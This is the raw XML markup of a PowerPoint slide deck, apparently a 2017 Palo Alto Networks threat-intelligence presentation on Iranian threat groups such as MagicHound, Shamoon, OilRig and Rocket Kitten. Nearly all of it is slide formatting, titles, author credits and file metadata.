                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ESMID IDRIZOVIC (PANW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MARK LIM (PANW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROBERT FALCONE (PANW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BRYAN LEE (PANW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EYAL SELA (CLEARSKY)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ICONS taken from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flaticon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3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25907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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="https://nattybeans.files.wordpress.com/2013/05/f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112"/>
            <a:ext cx="9157664" cy="5127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801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5807" y="2464139"/>
            <a:ext cx="5589925" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Coder's Crux 2" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>tlancaster@PALOALTONETWORKS.COM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Coder's Crux 2" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Coder's Crux 2" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Coder's Crux 2" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tlansec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Coder's Crux 2" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="PAN_BLA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6816" y="466688"/>
            <a:ext cx="2407901" cy="1287115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053639" y="2195257"/>
            <a:ext cx="1034257" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Old Republic" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>QUESTIONS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3920776" y="3256241"/>
            <a:ext cx="1299979" cy="1218730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191696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253" y="1925022"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Iran Threats Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363626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993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for neat server ro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78044" cy="5143500"/>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Image result for russian flag"/>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russian flag"/>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Flag of Russia.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9865" y="3896952"/>
            <a:ext cx="1654865" cy="110324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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6767513" y="1504122"/>
            <a:ext cx="1161221" cy="632790"/>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7612343" y="2311662"/>
            <a:ext cx="1412387" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APT29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1134096" y="2419350"/>
            <a:ext cx="809005" cy="500231"/>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624708" y="3011541"/>
            <a:ext cx="1436206" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APT28</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3904423" y="1820518"/>
            <a:ext cx="0" cy="1283729"/>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3035880" y="3044597"/>
            <a:ext cx="1758401" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TURLA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187523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2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Image result for server room before af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2311"/>
            <a:ext cx="9144000" cy="5180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iran flag wik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0175" y="3776268"/>
            <a:ext cx="1870419" cy="107090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a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3722424" y="2310749"/>
            <a:ext cx="2062566" cy="280026"/>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678215" y="2648808"/>
            <a:ext cx="2390880" cy="523220"/>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GREENBUG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2941414" y="1122815"/>
            <a:ext cx="812965" cy="1957180"/>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482400" y="3172028"/>
            <a:ext cx="2390880" cy="523220"/>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SHAMOON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2415209" y="642949"/>
            <a:ext cx="3032809" cy="1807813"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1016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941039" y="2322763"/>
            <a:ext cx="2390880" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ROCKET KITTEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334171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993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3562954" y="210913"/>
            <a:ext cx="2152371"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OILRIG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6669669" y="214093"/>
            <a:ext cx="2152372"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COPYKITTENS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305128" y="214093"/>
            <a:ext cx="2152372" cy="954156"/>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CADELLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3562956" y="1805322"/>
            <a:ext cx="2152371"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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SHAMOON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6669670" y="1840837"/>
            <a:ext cx="2152371"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MAGICHOUND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305128" y="1840837"/>
            <a:ext cx="2152371" cy="954156"/>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GREENBUG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651158" y="3563220"/>
            <a:ext cx="2152371"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NEWSCASTER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305129" y="3501783"/>
            <a:ext cx="2152371" cy="954156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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accent5"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OTHER IRAN THREATS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3509389" y="3546600"/>
            <a:ext cx="2152371" cy="95415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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROCKET KITTEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211845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348" y="1925022"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNPICKING THE WIRES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(unlike this presentation, not everything is black and white…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298623660"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="30_PAN_PPT_Template_4x3_White">
  <a:themeElements>
    <a:clrScheme name="PAN 2015">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="071C26"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="0E6D91"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="17ACDC"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="7FD0DD"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="B5D453"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="E6E547"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F9A145"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FDBC1D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="006595"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00659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65000"/>
                <a:lumOff val="35000"/>
              </a:schemeClr>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4" id="{6CA6BDA7-9136-5F42-9369-D06ABD709730}" vid="{0304F591-4C8D-F34F-9F0D-0844FD6CB726}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_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1629</TotalTime>
  <Words>2606</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>384</Paragraphs>
  <Slides>48</Slides>
  <Notes>39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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Coder's Crux 2</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Old Republic</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>30_PAN_PPT_Template_4x3_White</vt:lpstr>
      <vt:lpstr>1_Storyboard Layouts</vt:lpstr>
      <vt:lpstr>Storyboard Layouts</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Foreword</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Why should you care about Iranian threats?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MAGICHOUND</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>LINK TO SHAMOON?</vt:lpstr>
      <vt:lpstr>AUG 2012</vt:lpstr>
      <vt:lpstr>NOV 2016 ONWARDS…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SHAMOON – MAGICHOUND – the missing link</vt:lpstr>
      <vt:lpstr>LINKS TO OTHER THREAT ACTORS?</vt:lpstr>
      <vt:lpstr>MAGIC HOUND to ROCKET KITTEN?</vt:lpstr>
      <vt:lpstr>MAGICHOUND to NEWSCASTER</vt:lpstr>
      <vt:lpstr>MAGICHOUND // SHAMOON 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Iran Threats…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Explaining the softer links</vt:lpstr>
      <vt:lpstr>Which links does PANW Tom believe are valid?</vt:lpstr>
      <vt:lpstr>Wild, unfounded guesswork</vt:lpstr>
      <vt:lpstr>Actions you can take to defend yourselves…</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Tom Lancaster</cp:lastModifiedBy>
  <cp:revision>187</cp:revision>
  <cp:lastPrinted>2015-09-15T17:12:13Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-28T17:31:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-12T16:00:31Z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VersionGuid">
    <vt:lpwstr>d4c34152-9178-4564-b489-49fbab83aa01</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Offisync_UniqueId">
    <vt:lpwstr>19610</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Jive_LatestUserAccountName">
    <vt:lpwstr>tlancaster</vt:lpwstr>
  </property>
